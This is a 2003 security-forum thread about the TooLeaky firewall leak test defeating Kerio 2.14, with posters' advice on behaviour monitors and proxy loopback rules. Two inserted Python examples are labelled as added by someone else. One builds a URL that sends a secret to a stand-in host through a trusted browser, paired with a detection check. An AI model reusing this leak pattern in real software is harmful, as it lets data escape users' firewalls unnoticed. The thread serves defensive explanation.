Kerio and tooleaky?

Discussion in 'other firewalls' started by notageek, Apr 9, 2003.

Thread Status:
Not open for further replies.
  1. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I tried Tooleaky and it ran right through Kerio and said my firewall (Kerio) is useless. If this is the case, how do I fix it?
     
  2. CrazyM

    CrazyM Firewall Expert

    Joined:
    Feb 9, 2002
    Posts:
    2,428
    Location:
    BC, Canada
    The current release version of Kerio (v2.14) does not handle this type of program hijacking or .dll injection.

    One related post I found from the Kerio forum at DSLR:
    http://www.dslreports.com/forum/remark,2823724~root=kerio~mode=flat

    The v3.0x betas introduced measures to deal with this kind of potential vulnerability, but development stopped. Kerio is currently working on a new v3.5 which may be out shortly for beta testing. I would suspect it will also have measures to deal with this sort of thing.

    For those not familiar with tooleaky:
    http://tooleaky.zensoft.com/

    Regards,

    CrazyM
     
  3. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège
    Hello,

    You might run System Safety Monitor in conjunction with your FW and pass all leaktests with flying colours.

    Rgds,
     
  4. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    The beauty of "tooleaky" was not in its coding, but in the idea itself and its simplicity! If you look at the source code, there's really nothing to it, and yet, it can get by an awful lot of software firewalls. Or at least it could, until they started adding a lot of additional complex features to prevent this type of "exploit". Obviously, they never updated the old version of Kerio against this exploit, but most software firewalls have already or are addressing this and other exploit methods in their newer versions.

    The tooleaky concept depends entirely upon a piece of malware (tooleaky.exe in this case) being able to run a program that has been granted access out to the Internet through the firewall without the user knowing.

    You can defeat this type of exploit by not allowing any programs access out through the firewall without the user having to specifically allow them each time a new instance starts up. Well, that setup would defeat the simple tooleaky design, but, not the next thing someone thought up...

    Next they started having the malware program itself try to kill the software firewalls, or in some cases, have it "press" the confirmation buttons on the firewall alert pop-ups itself. And so went the attack mechanisms, and now the software firewall companies have to have protections from being killed from within the computer in them, protections against programs being able to click their buttons, and so on.

    There is of course one simple protection to all these types of exploits. They all require the user to download and execute a program. Safe computing habits make a formidable initial line of defense.

    After that, having the latest version of your software firewall, with all these special extra protections is what's needed, along side a safe configuration, of course.
     
  5. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    Yes, tools like SSM and Tiny Trojan Trap are the best defenses against these various exploits because they monitor and control the behavior of programs, and how they interact with the OS and each other.

    Many software firewall vendors are simply trying to build ever higher walls and other layers of defense around themselves. But, I think with every defense they add, the other side will just find a way to circumvent that. It'll go back and forth forever. :doubt:

    For anyone interested, here is what "tooleaky" itself does:
    That's all there is to it. It's a very simple attack considering how complex it is for the software firewall applications to defend against it.
     
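The mechanism the two posts above describe, as an added example that is neither TooLeaky's own source nor code from the thread: a TooLeaky-style leak hands its payload to a program the firewall already trusts, and an SSM-style behaviour monitor catches it by looking at who launched that program rather than at the socket. The collection URL, the executable names and every process record below are constructed for illustration.

```python
"""Added example (not TooLeaky's source and not from the original thread):
how a TooLeaky-style leak hands its payload to an already-trusted program,
and the kind of launch check an SSM-style behaviour monitor adds on top of
per-application firewall rules.  All process records below are constructed."""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical collection URL; TooLeaky reported to its own site.
COLLECT_URL = "http://example.invalid/collect"

def build_leak_url(secret: str, base: str = COLLECT_URL) -> str:
    """The entire trick: put the data in a URL and let a trusted browser
    carry it out.  The browser's socket, not the malware's, hits the firewall."""
    return f"{base}?d={quote(secret, safe='')}"

def leaked_secret(cmdline: str) -> Optional[str]:
    """What a monitor that inspects the command line can see leaving."""
    for tok in cmdline.split():
        if tok.startswith(("http://", "https://")):
            q = parse_qs(urlsplit(tok).query)
            if "d" in q:
                return q["d"][0]
    return None

@dataclass(frozen=True)
class ProcStart:
    image: str      # program being started
    parent: str     # program that started it
    cmdline: str    # command line it was started with

# Per-application firewall state: images already allowed out (assumed).
NET_ALLOWED = frozenset({"iexplore.exe", "opera.exe"})
# Behaviour-monitor state: parents allowed to launch those images silently.
TRUSTED_PARENTS = frozenset({"explorer.exe"})

def socket_verdict(image: str) -> str:
    """All a per-application firewall sees: which image owns the socket."""
    return "allow" if image in NET_ALLOWED else "ask"

def launch_verdict(ev: ProcStart) -> str:
    """What SSM-style monitoring adds: who launched the trusted image."""
    if ev.image in NET_ALLOWED and ev.parent not in TRUSTED_PARENTS:
        return "prompt"     # the TooLeaky case: unknown parent starting IE
    return "allow"

# Constructed events: the user opening IE, and a leak test doing the same.
EVENTS = [
    ProcStart("iexplore.exe", "explorer.exe",
              "iexplore.exe http://example.invalid/"),
    ProcStart("iexplore.exe", "tooleaky.exe",
              "iexplore.exe " + build_leak_url("my secret data")),
]

def audit(events=EVENTS):
    """Pair each launch with both verdicts and anything it would carry out."""
    return [(ev.parent, socket_verdict(ev.image), launch_verdict(ev),
             leaked_secret(ev.cmdline)) for ev in events]

if __name__ == "__main__":
    for parent, fw, mon, leak in audit():
        print(f"parent={parent:13s} firewall={fw:5s} monitor={mon:6s} leak={leak!r}")
```

Running it shows the point of post 4: the per-application firewall returns "allow" for both launches because the socket belongs to iexplore.exe either way; only the launch check, which knows the parent was tooleaky.exe, returns "prompt" and exposes the secret in the command line.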
  6. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I switched to Kerio from Sygate because you're able to make a loopback rule. I didn't want programs piggybacking on Proxo. But now I see Kerio can't block this type of stuff. I wonder if McAfee Firewall 4.0 will block piggybacks and tooleaky. :) Bloat up my computer to be safe. LOL ;) I tried SSM and it gave me an error message. It doesn't work well with XP. I also tried LookNStop and it said something about a drive not installed. I don't know what that means, but you know. Maybe I'll go back to Sygate and pray nothing piggybacks Proxo while I'm online until they come up with a fix for it. :) Thanks guys for the help.
     
  7. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège
    Hello,

    SSM is at its best with WinXP ;)

    Don't hesitate to contact Max (bugsbunnyATe-mail.ru) if you encountered any problem.

    Rgds,
     
  8. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    I'll try it again. It could have been a bad install or a bad download. Thanks Jack.
     
  9. deadmanschest

    deadmanschest Registered Member

    Joined:
    May 6, 2002
    Posts:
    105
    Kerio and Proxo foil Tooleaky etc...

    hi notageek - I use Kerio 2.13 and Proxo, and have always beaten tooleaky, leaktest and firehole, even when I used IE...

    Do you mean that you do not get an alert that Leaktest wants access out, or that it gets out 'secretly'?

    I have three simple rules that stop them all. I allow Opera/ Phoenix access to Proxo thru localhost:8080; I disallow any other apps any access to Proxo at all; and I allow Proxo full access out to any remote address;

    When I run Leaktest or Firehole, Opera opens up and connects to my homepage, then I get an alert that 'Firewall Leak Test Utility wants to connect to GRC' and I deny it....that's it...

    Now, if you want it to be denied, without any alert at all, then as I understand it you need the 'application blah blah filtering' that is supposed to be coming in the newer versions...

    Now I may be wrong, I'm a novice and no one ever believes that I have always foiled leaktest, tooleaky and firehole, but it's always worked for me. I think Tooleaky is hard-wired to use IE, as it never even opens a connection on my machine, as far as I know...haha...

    Good luck

    dmc
     
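The three rules in the post above, evaluated the way Kerio 2.x walks its rule list (top to bottom, first match wins, with an unmatched connection falling through to the default of asking the user, which is the alert the poster describes), as an added example in Python that is not part of the original post and is not Kerio's rule format. The executable names (proxomitron.exe, phoenix.exe, leaktest.exe), the proxy port 8080 from the post, and the remote address are assumed for illustration, and every connection attempt below is constructed.

```python
"""Added example (not from the original post, not Kerio's rule file):
first-match evaluation of the poster's three loopback rules against
constructed connection attempts."""
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Conn:
    app: str        # image name of the program opening the connection
    dst: str        # destination address
    port: int       # destination port

@dataclass(frozen=True)
class Rule:
    action: str                         # "allow" or "deny"
    apps: Optional[frozenset]           # None = any application
    dst: Optional[str]                  # None = any address
    port: Optional[int]                 # None = any port

    def matches(self, c: Conn) -> bool:
        return ((self.apps is None or c.app in self.apps)
                and (self.dst is None or c.dst == self.dst)
                and (self.port is None or c.port == self.port))

LOCALHOST, PROXO_PORT = "127.0.0.1", 8080      # Proxomitron on localhost:8080

# The poster's three rules, in evaluation order (first match wins).
# Executable names are assumed.
RULES = [
    # 1. Opera / Phoenix may talk to Proxomitron
    Rule("allow", frozenset({"opera.exe", "phoenix.exe"}), LOCALHOST, PROXO_PORT),
    # 2. nothing else may talk to Proxomitron (silent deny, no alert)
    Rule("deny",  None,                                    LOCALHOST, PROXO_PORT),
    # 3. Proxomitron itself may go anywhere
    Rule("allow", frozenset({"proxomitron.exe"}),          None,      None),
]

def evaluate(c: Conn, rules=RULES) -> str:
    """First matching rule decides.  An unmatched connection falls through
    to the default, taken here to be Kerio's 'ask the user' alert."""
    for r in rules:
        if r.matches(c):
            return r.action
    return "ask"

# Constructed attempts: the browser via the proxy, Proxomitron going out,
# a leak test that has hijacked IE to go via the proxy, and a leak test
# connecting out directly.  198.51.100.7 is a documentation address.
ATTEMPTS = {
    "browser via proxy":     Conn("opera.exe",       LOCALHOST,      PROXO_PORT),
    "proxo out":             Conn("proxomitron.exe", "198.51.100.7", 80),
    "hijacked IE via proxy": Conn("iexplore.exe",    LOCALHOST,      PROXO_PORT),
    "leaktest direct":       Conn("leaktest.exe",    "198.51.100.7", 80),
}

def audit(attempts=ATTEMPTS) -> dict:
    """Verdict for each constructed attempt."""
    return {name: evaluate(c) for name, c in attempts.items()}

if __name__ == "__main__":
    for name, v in audit().items():
        print(f"{name:24s} -> {v}")
```

The "hijacked IE via proxy" case is the one the poster relies on: because rule 2 denies every application other than the two browsers, a leak test that launches IE against the proxy is dropped by the loopback rule without an alert, while "leaktest direct" matches no rule and produces the alert described. The gap in this setup is also visible: if the hijacked program is one that rule 1 already allows, the proxy rules cannot tell it from the user's own browsing, which is the situation the earlier posts attribute to TooLeaky.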
  10. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    Tooleaky sneaks out without me knowing it. Kerio has a slight learning curve. Maybe the new Kerio (whenever it comes out) might be a little better. But right now I'm waiting for the new Sygate or Outpost. I'm going to jump on the first one that comes out.
     
  11. spy1

    spy1 Registered Member

    Joined:
    Dec 29, 2002
    Posts:
    3,139
    Location:
    Clover, SC
    For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so?

    I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete
     
  12. root

    root Registered Member

    Joined:
    Feb 19, 2002
    Posts:
    1,723
    Location:
    Missouri, USA
    I haven't used it on XP, but it has a user mode, and can be password protected.
    Its a small free program, so I think there is minimal risk in installing it and checking it out.
    FWIW Pete, SSM is a must have in my security line up. If I had to choose between SSM and an AT, I would take SSM.
    The best thing about it is that there are several exploits, aka leak tests, that have not even been discovered or publicized yet, and while firewall vendors will have to react to block them, SSM is already able to.
     
  13. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    What's the difference between SSM and Abtrusion Protector? Does it use fewer resources than Abtrusion Protector?
     
  14. SpaceCowboy

    SpaceCowboy Registered Member

    Joined:
    Oct 20, 2002
    Posts:
    40
    SSM protects all users, but only the user that logs on at bootup will get the prompts for new applications. So another user that tries to install a new application will have no idea why they can't, because the prompt will be on the original user's screen.
     
  15. spy1

    spy1 Registered Member

    Joined:
    Dec 29, 2002
    Posts:
    3,139
    Location:
    Clover, SC
    Thank you, root and SC. I'm liking the sound of it more and more. Pete
     
  16. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège
    Hello,

    SSM uses about 6 MB of RAM on my system (WinXP Pro); I don't remember how much for AP.

    SSM is compatible with non-NT OSes; AP is not.

    The biggest issue with AP is that you must be ABSOLUTELY sure your OS is clean: when installing, it scans all EXEs and DLLs and everything is considered trusted by default, including any installed malware.

    Rgds,
     
  17. notageek

    notageek Registered Member

    Joined:
    Jun 3, 2002
    Posts:
    1,601
    Location:
    Ohio
    Thanks Jack.
     